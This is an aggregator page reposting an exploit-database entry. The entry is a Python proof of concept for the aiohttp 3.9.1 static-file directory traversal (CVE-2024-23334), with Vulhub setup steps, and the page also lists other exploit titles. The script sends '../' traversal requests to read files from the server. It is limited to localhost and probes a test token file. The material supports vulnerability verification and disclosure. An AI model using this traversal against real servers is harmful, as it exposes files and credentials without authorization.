惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

IT之家
IT之家
C
CXSECURITY Database RSS Feed - CXSecurity.com
V
Visual Studio Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
小众软件
小众软件
L
LangChain Blog
Cyberwarzone
Cyberwarzone
美团技术团队
The Register - Security
The Register - Security
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Tor Project blog
V
V2EX
Security Archives - TechRepublic
Security Archives - TechRepublic
Hacker News: Ask HN
Hacker News: Ask HN
L
LINUX DO - 最新话题
Recent Announcements
Recent Announcements
H
Hackread – Cybersecurity News, Data Breaches, AI and More
酷 壳 – CoolShell
酷 壳 – CoolShell
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
aimingoo的专栏
aimingoo的专栏
人人都是产品经理
人人都是产品经理
F
Full Disclosure
V2EX - 技术
V2EX - 技术
The Cloudflare Blog
博客园 - 叶小钗
T
Threat Research - Cisco Blogs
阮一峰的网络日志
阮一峰的网络日志
G
GRAHAM CLULEY
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Latest news
Latest news
S
Security @ Cisco Blogs
Spread Privacy
Spread Privacy
Project Zero
Project Zero
K
Kaspersky official blog
MyScale Blog
MyScale Blog
Attack and Defense Labs
Attack and Defense Labs
云风的 BLOG
云风的 BLOG
博客园 - 【当耐特】
Hacker News - Newest:
Hacker News - Newest: "LLM"
大猫的无限游戏
大猫的无限游戏
P
Privacy International News Feed
Google DeepMind News
Google DeepMind News
WordPress大学
WordPress大学
C
Cybersecurity and Infrastructure Security Agency CISA
Webroot Blog
Webroot Blog
罗磊的独立博客
Vercel News
Vercel News
N
News and Events Feed by Topic
A
Arctic Wolf
C
CERT Recently Published Vulnerability Notes

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
aiohttp 3.9.1 Directory Traversal - CXSecurity.com
2026-02-05 · via The Exploit Database - CXSecurity.com

aiohttp 3.9.1 Directory Traversal

# Exploit Title: Python aiohttp directory traversal PoC (CVE-2024-23334) # Google Dork: N/A # Date: 2025-10-06 # Exploit Author: Beatriz Fresno Naumova # Vendor Homepage: https://www.aiohttp.org / https://www.python.org # Software Link: https://github.com/aio-libs/aiohttp (vulnerable tag: 3.9.1) # Version: aiohttp 3.9.1 (vulnerable) # Tested on: Linux (host for Vulhub / Docker) and inside container VM: aiohttp 3.9.1 # CVE: CVE-2024-23334 # Description: # Proof-of-concept to verify directory-traversal behavior when aiohttp is configured # to serve static files with follow_symlinks=True (affects aiohttp <= 3.9.1). # This PoC is intentionally restricted to local testing and will refuse non-local targets. # Environment setup (Vulhub example): # 1. Obtain Vulhub and change to the aiohttp 3.9.1 directory: # cd vulhub/python/aiohttp/3.9.1 # 2. Start the vulnerable service: # docker compose up -d # 3. Verify the service is accessible on localhost:8080: # curl -v http://localhost:8080/ # should respond # # Prepare a safe probe file inside the container (non-sensitive): # 1. Identify the container name or ID with `docker ps`. # 2. Create a test token file inside the container: # docker exec -it <container> /bin/sh -c "echo 'POC-AIOHTTP-VULN-TEST' > /tmp/poc-aiohttp-test.txt && chmod 644 /tmp/poc-aiohttp-test.txt" # 3. Verify: # docker exec -it <container> /bin/sh -c "cat /tmp/poc-aiohttp-test.txt" # # should print: POC-AIOHTTP-VULN-TEST # # How to run this PoC (local only): # 1. Save this file as poc_aiohttp_cve-2024-23334.py # 2. Run it on the host that has access to the vulnerable container's localhost port: # python3 poc_aiohttp_cve-2024-23334.py --port 8080 --probe /tmp/poc-aiohttp-test.txt --depth 8 # #!/usr/bin/env python3 """ Safe local-only PoC verifier for CVE-2024-23334 (aiohttp static follow_symlinks). This script will refuse to target any host other than localhost/127.0.0.1/::1. Example: python3 poc_aiohttp_cve-2024-23334.py --port 8080 --probe /tmp/poc-aiohttp-test.txt --depth 8 If the vulnerable server returns the probe file contents, the script prints the body and reports VULNERABLE. """ from __future__ import annotations import argparse import socket import sys import urllib.parse import http.client LOCAL_HOSTS = {"127.0.0.1", "localhost", "::1"} def is_localhost(host: str) -> bool: """Only allow local hosts to avoid misuse.""" return host in LOCAL_HOSTS def build_traversal_path(probe_path: str, depth: int = 8) -> str: """ Build a traversal-style path to append to /static/. Depth can be adjusted if the server root / static layout needs more ../ segments. """ probe = probe_path.lstrip("/") ups = "../" * depth return f"/static/{ups}{probe}" def try_connect(host: str, port: int, timeout: float = 3.0) -> bool: try: with socket.create_connection((host, port), timeout=timeout): return True except Exception: return False def send_get(host: str, port: int, path: str, timeout: float = 10.0): conn = http.client.HTTPConnection(host, port, timeout=timeout) try: conn.request("GET", path, headers={"User-Agent": "poc-aiohttp-check/1.0", "Accept": "*/*"}) resp = conn.getresponse() body = resp.read() return resp.status, body finally: try: conn.close() except Exception: pass def main(): parser = argparse.ArgumentParser(description="Local-only PoC verifier for aiohttp traversal (CVE-2024-23334).") parser.add_argument("--host", default="127.0.0.1", help="Target host (MUST be localhost).") parser.add_argument("--port", type=int, default=8080, help="Target port (default: 8080).") parser.add_argument("--probe", required=True, help="Absolute path on server to probe (e.g. /tmp/poc-aiohttp-test.txt).") parser.add_argument("--depth", type=int, default=8, help="Traversal depth (increase if needed).") parser.add_argument("--timeout", type=float, default=10.0, help="Request timeout seconds.") args = parser.parse_args() host = args.host.strip() port = int(args.port) if not is_localhost(host): print("ERROR: This PoC is restricted to localhost for safety. Use only in an isolated lab.", file=sys.stderr) sys.exit(2) # quick reachability check if not try_connect(host, port, timeout=3.0): print(f"ERROR: cannot reach {host}:{port}. Is the vulnerable server running and port exposed on localhost?", file=sys.stderr) sys.exit(3) path = build_traversal_path(args.probe, depth=args.depth) # encode path but keep slash and common safe chars path = urllib.parse.quote(path, safe="/?=&%") print(f"[*] Sending GET {path} to {host}:{port} (local lab only)") status, body = send_get(host, port, path, timeout=args.timeout) print(f"[+] HTTP {status}") if body: try: text = body.decode("utf-8", errors="replace") except Exception: text = repr(body) print("----- RESPONSE BODY START -----") print(text) print("----- RESPONSE BODY END -----") # heuristic: check for the expected test token if "POC-AIOHTTP-VULN-TEST" in text: print("[!] VULNERABLE: test token found in response (lab-confirmed).") sys.exit(0) else: print("[ ] Test token not found in response. The server may not be vulnerable or probe path/depth needs adjustment.") sys.exit(1) else: print("[ ] Empty response body.") sys.exit(1) if __name__ == "__main__": main()



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}